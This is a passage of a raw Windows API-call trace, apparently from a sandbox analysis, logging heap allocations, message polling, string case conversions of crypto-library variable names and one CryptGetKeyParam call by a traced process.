(HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8dec40 [0192.700] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9fd0 [0192.700] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c26d8 [0192.700] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bdab0 [0192.700] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd6f0 [0192.700] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c27f8 [0192.700] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd6f0 | out: hHeap=0x8a0000) returned 1 [0192.700] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8ded30 [0192.700] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd6f0 [0192.700] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c28c8 [0192.701] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd5d0 [0192.701] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c28c8 | out: hHeap=0x8a0000) returned 1 [0192.701] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x14) returned 0x90d480 [0192.701] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c28c8 [0192.701] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8dee20 [0192.701] CharLowerBuffW (in: lpsz="uint;dword", cchLength=0xa | out: lpsz="uint;dword") returned 0xa [0192.701] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x44) returned 0x9aa548 [0192.701] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba180 [0192.701] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c27d8 [0192.701] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba288 [0192.701] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2768 [0192.701] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd918 [0192.701] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c28e8 [0192.701] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bda50 [0192.701] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2758 [0192.701] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd3a8 [0192.701] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2708 [0192.701] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd3a8 | out: hHeap=0x8a0000) returned 1 [0192.701] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2708 | out: hHeap=0x8a0000) returned 1 [0192.701] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bda50 | out: hHeap=0x8a0000) returned 1 [0192.701] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2758 | out: hHeap=0x8a0000) returned 1 [0192.701] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd918 | out: hHeap=0x8a0000) returned 1 [0192.701] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c28e8 | out: hHeap=0x8a0000) returned 1 [0192.701] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c28e8 [0192.702] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2758 [0192.702] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8dee20 | out: hHeap=0x8a0000) returned 1 [0192.702] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c28c8 | out: hHeap=0x8a0000) returned 1 [0192.702] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd5d0 | out: hHeap=0x8a0000) returned 1 [0192.702] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd6f0 | out: hHeap=0x8a0000) returned 1 [0192.702] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8ded30 | out: hHeap=0x8a0000) returned 1 [0192.702] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c27f8 | out: hHeap=0x8a0000) returned 1 [0192.702] PeekMessageW (in: lpMsg=0x87e924, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e924) returned 0 [0192.702] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8ded30 [0192.702] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd6f0 [0192.702] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c27f8 [0192.702] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x14) returned 0x90d440 [0192.702] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x44) returned 0x9aa4f8 [0192.702] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd5d0 [0192.702] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c28c8 [0192.702] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd918 [0192.702] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2708 [0192.702] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c27f8 | out: hHeap=0x8a0000) returned 1 [0192.702] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bda50 [0192.702] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c27f8 [0192.702] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c27f8 | out: hHeap=0x8a0000) returned 1 [0192.702] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd3a8 [0192.702] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c27f8 [0192.703] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c27f8 | out: hHeap=0x8a0000) returned 1 [0192.703] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd918 | out: hHeap=0x8a0000) returned 1 [0192.703] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2708 | out: hHeap=0x8a0000) returned 1 [0192.703] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd5d0 | out: hHeap=0x8a0000) returned 1 [0192.703] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c28c8 | out: hHeap=0x8a0000) returned 1 [0192.703] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9aa4f8 | out: hHeap=0x8a0000) returned 1 [0192.703] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90d440 | out: hHeap=0x8a0000) returned 1 [0192.703] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd6f0 | out: hHeap=0x8a0000) returned 1 [0192.703] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bda50 | out: hHeap=0x8a0000) returned 1 [0192.703] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd3a8 | out: hHeap=0x8a0000) returned 1 [0192.703] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8ded30 | out: hHeap=0x8a0000) returned 1 [0192.703] PeekMessageW (in: lpMsg=0x87e924, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e924) returned 0 [0192.703] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8ded30 [0192.703] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd3a8 [0192.703] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c28c8 [0192.703] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bda50 [0192.703] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd6f0 [0192.703] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2708 [0192.703] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd6f0 | out: hHeap=0x8a0000) returned 1 [0192.703] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8dee20 [0192.703] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd6f0 [0192.703] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c27f8 [0192.703] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2828 [0192.703] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x30) returned 0x9bf380 [0192.704] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0192.704] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bf380 | out: hHeap=0x8a0000) returned 1 [0192.704] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2828 | out: hHeap=0x8a0000) returned 1 [0192.704] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0xc) returned 0x9bd5d0 [0192.704] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x40) returned 0x8db408 [0192.704] PeekMessageW (in: lpMsg=0x87e2d4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e2d4) returned 0 [0192.704] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2828 [0192.704] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2818 [0192.704] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2818 | out: hHeap=0x8a0000) returned 1 [0192.704] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2828 | out: hHeap=0x8a0000) returned 1 [0192.704] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8db408 | out: hHeap=0x8a0000) returned 1 [0192.704] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd5d0 | out: hHeap=0x8a0000) returned 1 [0192.704] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c27f8 | out: hHeap=0x8a0000) returned 1 [0192.704] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd5d0 [0192.704] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c27f8 [0192.704] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd918 [0192.704] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c27f8 | out: hHeap=0x8a0000) returned 1 [0192.704] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9fe8 [0192.704] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c27f8 [0192.704] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba270 [0192.704] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c27f8 | out: hHeap=0x8a0000) returned 1 [0192.704] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9a60 [0192.704] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c27f8 [0192.704] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bda20 [0192.705] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c27f8 | out: hHeap=0x8a0000) returned 1 [0192.705] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9f58 [0192.705] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c27f8 [0192.705] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c27f8 | out: hHeap=0x8a0000) returned 1 [0192.705] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd840 [0192.705] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c27f8 [0192.705] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd360 [0192.705] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c27f8 | out: hHeap=0x8a0000) returned 1 [0192.705] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd378 [0192.705] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c27f8 [0192.705] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c27f8 | out: hHeap=0x8a0000) returned 1 [0192.705] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd438 [0192.705] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c27f8 [0192.705] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd558 [0192.705] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c27f8 | out: hHeap=0x8a0000) returned 1 [0192.705] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x40) returned 0x8db408 [0192.705] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8dee20 | out: hHeap=0x8a0000) returned 1 [0192.705] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd408 [0192.705] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c27f8 [0192.705] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8dee20 [0192.705] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9b50 [0192.705] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2828 [0192.705] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x14) returned 0x90d440 [0192.705] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x44) returned 0x9aa4f8 [0192.706] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba3f0 [0192.706] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2818 [0192.706] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bda38 [0192.706] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2878 [0192.706] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2828 | out: hHeap=0x8a0000) returned 1 [0192.706] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd990 [0192.706] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2828 [0192.706] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2828 | out: hHeap=0x8a0000) returned 1 [0192.706] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bda38 | out: hHeap=0x8a0000) returned 1 [0192.706] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2878 | out: hHeap=0x8a0000) returned 1 [0192.706] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba3f0 | out: hHeap=0x8a0000) returned 1 [0192.706] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2818 | out: hHeap=0x8a0000) returned 1 [0192.706] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9aa4f8 | out: hHeap=0x8a0000) returned 1 [0192.706] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90d440 | out: hHeap=0x8a0000) returned 1 [0192.706] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9b50 | out: hHeap=0x8a0000) returned 1 [0192.706] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd990 | out: hHeap=0x8a0000) returned 1 [0192.706] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8dee20 | out: hHeap=0x8a0000) returned 1 [0192.706] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c27f8 | out: hHeap=0x8a0000) returned 1 [0192.706] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd990 [0192.706] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c27f8 [0192.706] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9b50 [0192.706] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c27f8 | out: hHeap=0x8a0000) returned 1 [0192.706] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba3f0 [0192.707] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c27f8 [0192.707] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8dee20 [0192.707] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bda38 [0192.707] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2818 [0192.707] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x14) returned 0x90d440 [0192.707] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x44) returned 0x9aa4f8 [0192.707] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd480 [0192.707] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2878 [0192.707] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba018 [0192.707] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2828 [0192.707] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2818 | out: hHeap=0x8a0000) returned 1 [0192.707] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd5b8 [0192.707] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2818 [0192.707] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2818 | out: hHeap=0x8a0000) returned 1 [0192.707] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba018 | out: hHeap=0x8a0000) returned 1 [0192.707] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2828 | out: hHeap=0x8a0000) returned 1 [0192.707] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd480 | out: hHeap=0x8a0000) returned 1 [0192.707] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2878 | out: hHeap=0x8a0000) returned 1 [0192.707] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9aa4f8 | out: hHeap=0x8a0000) returned 1 [0192.707] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90d440 | out: hHeap=0x8a0000) returned 1 [0192.707] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bda38 | out: hHeap=0x8a0000) returned 1 [0192.707] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd5b8 | out: hHeap=0x8a0000) returned 1 [0192.707] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8dee20 | out: hHeap=0x8a0000) returned 1 [0192.708] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c27f8 | out: hHeap=0x8a0000) returned 1 [0192.708] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd5b8 [0192.708] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c27f8 [0192.708] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bda38 [0192.708] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c27f8 | out: hHeap=0x8a0000) returned 1 [0192.708] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd480 [0192.708] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c27f8 [0192.708] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c27f8 | out: hHeap=0x8a0000) returned 1 [0192.708] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c27f8 [0192.708] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba018 [0192.708] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0192.708] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba2e8 [0192.708] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2878 [0192.708] CryptGetKeyParam (in: hKey=0x90af18, dwParam=0x7, pbData=0x9c2758, pdwDataLen=0x87e2f0, dwFlags=0x0 | out: pbData=0x9c2758*=0x660e, pdwDataLen=0x87e2f0*=0x4) returned 1 [0192.708] PeekMessageW (in: lpMsg=0x87e924, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e924) returned 0 [0192.708] PeekMessageW (in: lpMsg=0x87e924, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e924) returned 0 [0192.708] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0192.708] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0192.708] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0192.709] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0192.709] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90b018 | out: hHeap=0x8a0000) returned 1 [0192.709] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0192.709] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0192.709] CharUpperBuffW (in: lpsz="_CRYPT_STARTUP", cchLength=0xe | out: lpsz="_CRYPT_STARTUP") returned 0xe [0192.709] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8def60 | out: hHeap=0x8a0000) returned 1 [0192.709] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2768 | out: hHeap=0x8a0000) returned 1 [0192.709] PeekMessageW (in: lpMsg=0x87ebe4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ebe4) returned 0 [0192.709] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0192.709] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bf380 | out: hHeap=0x8a0000) returned 1 [0192.709] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26e8 | out: hHeap=0x8a0000) returned 1 [0192.709] PeekMessageW (in: lpMsg=0x87e7c4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e7c4) returned 0 [0192.709] PeekMessageW (in: lpMsg=0x87ebe4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ebe4) returned 0 [0192.709] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90b018 | out: hHeap=0x8a0000) returned 1 [0192.709] PeekMessageW (in: lpMsg=0x87ebe4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ebe4) returned 0 [0192.709] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTINC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTINC") returned 0x13 [0192.709] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bf380 | out: hHeap=0x8a0000) returned 1 [0192.709] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2768 | out: hHeap=0x8a0000) returned 1 [0192.709] PeekMessageW (in: lpMsg=0x87e98c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e98c) returned 0 [0192.709] PeekMessageW (in: lpMsg=0x87e98c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e98c) returned 0 [0192.709] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8db408 | out: hHeap=0x8a0000) returned 1 [0192.709] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba168 | out: hHeap=0x8a0000) returned 1 [0192.710] PeekMessageW (in: lpMsg=0x87ebe4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ebe4) returned 0 [0192.710] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0192.710] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0192.710] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0192.710] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90b058 | out: hHeap=0x8a0000) returned 1 [0192.710] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0192.710] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0192.710] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bf380 | out: hHeap=0x8a0000) returned 1 [0192.710] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c28c8 | out: hHeap=0x8a0000) returned 1 [0192.710] PeekMessageW (in: lpMsg=0x87e7d4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e7d4) returned 0 [0192.710] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: 